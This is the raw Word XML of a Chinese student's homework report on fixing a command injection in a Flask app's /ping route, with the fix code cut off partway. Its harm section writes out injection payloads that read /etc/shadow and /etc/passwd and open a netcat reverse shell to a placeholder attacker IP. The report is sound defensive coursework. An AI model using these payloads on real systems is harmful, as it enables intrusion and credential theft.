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宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>命令注入漏洞修复报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户管理系统 · Day9 作业</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>班    级：___3___    姓    名：汪乙函    学    号：___2025141530103___    提交日期：2026年07月15日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>————————————————————————————————————————</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>一、概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.1 作业内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在 Day8 SSRF 漏洞修复的基础上，针对用户管理系统中新增的 Ping 网络诊断功能（/ping 路由）进行命令注入漏洞审计与修复。本次作业重点排查了系统内所有涉及系统命令执行的代码路径，发现并修复了 1 处核心命令注入漏洞，采用四层防御体系全面拦截 shell=True 导致的任意命令执行风险，涵盖 CSRF 校验、移除 shell=True、字符白名单、DNS 预解析等防御措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.2 测试环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">目标系统    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户管理系统 (Flask + SQLite)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">测试地址    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://192.168.184.131:5000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Kali GNU/Linux Rolling 2026.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞触发点    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/ping 路由（POST）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">测试方法    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>黑盒命令注入测试 + 白盒代码审计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>github.com/894728749/user-management-system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>二、漏洞发现总览</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1"/>
        <w:gridCol w:w="2161"/>
        <w:gridCol w:w="2161"/>
        <w:gridCol w:w="2161"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>修复状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CMDI-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ping 命令注入 — shell=True + f-string 拼接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CMDI-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CSRF 缺失 — Ping 接口无 Token 校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CMDI-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>特殊字符绕过 — shell 元字符未过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2161"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>已修复</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>三、漏洞详情与修复过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CMDI-001：Ping 命令注入 — shell=True + f-string 拼接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【漏洞描述】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/ping 路由使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>subprocess.check_output()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行系统命令，并设置了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。攻击者在 ip 参数中输入特殊字符（如 ;、|、&amp;&amp;、``、$() 等），可以直接拼接任意系统命令并执行。由于 Web 服务以 root 权限运行，攻击者可通过命令注入获得服务器的最高控制权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【漏洞位置】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app.py → ping() 路由（POST /ping）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【未修复前的危害】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>危害一：分号注入执行任意命令（最基础）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者提交 127.0.0.1; id，实际执行 ping -c 3 127.0.0.1; id，id 命令输出 uid=0(root)，确认 root 权限运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>危害二：管道注入读取系统敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者提交 127.0.0.1 | cat /etc/shadow，管道将 ping 输出传递给 cat 命令，root 密码哈希直接返回。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>危害三：逻辑运算符注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>127.0.0.1 &amp;&amp; whoami 和 127.0.0.1 || ls -la 均可执行后续命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>危害四：反引号与子 Shell 注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`uname -a` 和 $(cat /etc/passwd) 在 shell 中优先执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>危害五：反弹 Shell 攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>; nc 攻击者IP 8888 -e /bin/bash 直接获得交互式 Shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复思路：四层防御体系】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第一层 — CSRF 校验：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>添加 _check_csrf() 服务端 Token 校验，防御跨站请求伪造触发的命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第二层 — 移除 shell=True：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>将字符串命令改为列表参数 subprocess.check_output(["ping", "-c", "3", ip])，不经过 shell 解释。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第三层 — 字符白名单：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实现 _is_valid_ping_target()，仅允许合法 IP 和域名，拦截所有 shell 特殊字符。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第四层 — DNS 预解析：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用 socket.getaddrinfo() 预解析目标，无效域名提前拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>【修复代码】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>修复前：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cmd = f"ping -c 3 {ip}"                    # f-string格式化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>result = subprocess.check_output(cmd, shell=True)  # shell=True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># ❌ 无CSRF ❌ 无过滤 ❌ shell=True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>修复后：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 第一层: CSRF校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if not _check_csrf(token): return "安全验证失败"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 第三层: 字符白名单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if not _is_valid_ping_target(ip): return "无效的IP地址或域名"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 第四层: DNS预解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
